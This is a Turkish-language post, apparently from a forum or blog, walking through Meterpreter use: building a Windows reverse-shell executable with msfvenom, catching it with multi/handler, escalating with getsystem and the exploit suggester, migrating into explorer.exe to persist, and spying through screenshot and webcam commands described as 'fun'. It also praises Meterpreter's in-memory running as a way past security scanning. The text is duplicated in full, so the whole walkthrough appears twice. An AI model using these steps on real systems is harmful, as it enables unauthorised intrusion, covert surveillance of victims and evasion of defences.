- 12 Eyl 2023
- 79
- 30
Meterpreter payloadların babalarıdır aklınıza gelen bir çok şeyi yapabilirsiniz; cihazın kamerasına ulaşmak, ekranını görüntülemek, klavyesine erişmemiz gibi.
Meterpreter RAM içerisinde çalışır bunun nedeni bir çoğu güvenlik cihazının sadece diske yazılan öğeleri tarar yani bu şekilde meterpreter aradan sıyrılır.
Bir diğer özelliği ise diğer payloadlara kıyasla kendisini bir dosya olarak değil kendisini proses(süreç) olarak gösterir.
Meterpreter payloadlarına bakmak için `msfvenom --list payloads | grep meterpreter` komutunu kullanabilirsiniz.
Bu arada Meterpreterı sadece Windows için değil Linux, Android, İOS, JAVA gibi sistemlerde de kullanabilirsiniz.
`msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=111.111.1.11 LPORT=443 -f exe -o meterpreter.exe` Evet normal bir payload gibi çalıştırıyoruz Meterpreterı şimdi portu dinlemeye alalım.
Portu dinlemeye almadan önce birşey hatırlayım bunun gibi bir payloada ncat işlemez bağlantısı kopar bunun için Metasploitin içinde olan **Multi Handler** kullanırız.
`use multi/handler`
`set payload windows/x64/meterpreter_reverse_tcp`
`set LHOST=111.111.1.11`
`set LPORT=443`
`run`
Evet artık payload çalıştırıldığında sisteme sızmış oluruz. Sisteme sızdıktan sonra yetki yükseltmek isterseniz `getsystem` komutunu yazabilirsiniz bu komut gerekli tokenleri bulursa çalışır.
Eğlence kısmına gelcek olursak şu komutları deneyebilirsiniz.
`screenshot`
`webcam_snap`
`screenshare`
`webcam_stream`
Eğlence kısmından çıkıp asıl amacımıza odaklanıcak olursak unutmayın başlarken size birşey demiştim meterpreterın RAM'de çalıştığı yani bu demek oluyorki bizim maceramız sistemin kapanmasına kadar bunu bundan kurtarmak için kendimizi sistem açıldığı andan itibaren çalışan bir proses'e migrate olmamız gerek.
Aktif olarak çalışan prosesleri görüntülemek için `ps` komutunu kullanabiliriz.
Migrate etme kısmına tekrardan gelicek olursak birşey daha eklemem gerek migrate olurken sadece kendi yetkilerimize sahip bir proses'e migrate olabiliriz yani kök yetkilerine sahip değilken service.exe'ye migrate olamayız bizim migrate olacağımız şeylerden birtanesi explorer.exe 'dir bu Windowsun arayüzüdür yani sistem çalıştığı andan itibaren aktif hale gelir.
Eğer kendimize chrome.exe gibi bir proses'e migrate edersek sadece kullanıcı chrome açtığında aktif hale geliriz.
Migrate olmak için `migrate id` komutunu kullanırız idlere `ps` komutundan bakarız.
Son olarak aklına takılmış olabilceğinden System olmayı yani yetki yükseltmeyi göstericeğim.
Bunun içinde bir exploit kulllancağız şu şekilde:
`msfconsole`
`search suggester`
`options`
Bizden istenen sadece bir Sessions id.
`sessions`
Bu komutu yazdığımızda aktif olarak kullandığımız meterpreter payloadı gözükücektir bunun id'sini girelim.
`set sessions 1`
Veee
`run`
Şimdi bize biraz metasploit modüllerini araştırıcak ve hedefin hangi modüllere karşı zafiyeti varsa onu bize sunucak.
Zafiyeti modülünü bulduğunu ve options kısmını doldurduğumuzu varsayarsak artık tamam, yani 2. meterpreter sessionun açıldığına dair bir mesaj aldıysanız tamam.
Artık tekrar gidip meterpreterda `getsystem` komutunu çalıştırın.
BOOM artık haklara sahibiz
Meterpreter RAM içerisinde çalışır bunun nedeni bir çoğu güvenlik cihazının sadece diske yazılan öğeleri tarar yani bu şekilde meterpreter aradan sıyrılır.
Bir diğer özelliği ise diğer payloadlara kıyasla kendisini bir dosya olarak değil kendisini proses(süreç) olarak gösterir.
Meterpreter payloadlarına bakmak için `msfvenom --list payloads | grep meterpreter` komutunu kullanabilirsiniz.
Bu arada Meterpreterı sadece Windows için değil Linux, Android, İOS, JAVA gibi sistemlerde de kullanabilirsiniz.
`msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=111.111.1.11 LPORT=443 -f exe -o meterpreter.exe` Evet normal bir payload gibi çalıştırıyoruz Meterpreterı şimdi portu dinlemeye alalım.
Portu dinlemeye almadan önce birşey hatırlayım bunun gibi bir payloada ncat işlemez bağlantısı kopar bunun için Metasploitin içinde olan **Multi Handler** kullanırız.
`use multi/handler`
`set payload windows/x64/meterpreter_reverse_tcp`
`set LHOST=111.111.1.11`
`set LPORT=443`
`run`
Evet artık payload çalıştırıldığında sisteme sızmış oluruz. Sisteme sızdıktan sonra yetki yükseltmek isterseniz `getsystem` komutunu yazabilirsiniz bu komut gerekli tokenleri bulursa çalışır.
Eğlence kısmına gelcek olursak şu komutları deneyebilirsiniz.
`screenshot`
`webcam_snap`
`screenshare`
`webcam_stream`
Eğlence kısmından çıkıp asıl amacımıza odaklanıcak olursak unutmayın başlarken size birşey demiştim meterpreterın RAM'de çalıştığı yani bu demek oluyorki bizim maceramız sistemin kapanmasına kadar bunu bundan kurtarmak için kendimizi sistem açıldığı andan itibaren çalışan bir proses'e migrate olmamız gerek.
Aktif olarak çalışan prosesleri görüntülemek için `ps` komutunu kullanabiliriz.
Migrate etme kısmına tekrardan gelicek olursak birşey daha eklemem gerek migrate olurken sadece kendi yetkilerimize sahip bir proses'e migrate olabiliriz yani kök yetkilerine sahip değilken service.exe'ye migrate olamayız bizim migrate olacağımız şeylerden birtanesi explorer.exe 'dir bu Windowsun arayüzüdür yani sistem çalıştığı andan itibaren aktif hale gelir.
Eğer kendimize chrome.exe gibi bir proses'e migrate edersek sadece kullanıcı chrome açtığında aktif hale geliriz.
Migrate olmak için `migrate id` komutunu kullanırız idlere `ps` komutundan bakarız.
Son olarak aklına takılmış olabilceğinden System olmayı yani yetki yükseltmeyi göstericeğim.
Bunun içinde bir exploit kulllancağız şu şekilde:
`msfconsole`
`search suggester`
`options`
Bizden istenen sadece bir Sessions id.
`sessions`
Bu komutu yazdığımızda aktif olarak kullandığımız meterpreter payloadı gözükücektir bunun id'sini girelim.
`set sessions 1`
Veee
`run`
Şimdi bize biraz metasploit modüllerini araştırıcak ve hedefin hangi modüllere karşı zafiyeti varsa onu bize sunucak.
Zafiyeti modülünü bulduğunu ve options kısmını doldurduğumuzu varsayarsak artık tamam, yani 2. meterpreter sessionun açıldığına dair bir mesaj aldıysanız tamam.
Artık tekrar gidip meterpreterda `getsystem` komutunu çalıştırın.
BOOM artık haklara sahibiz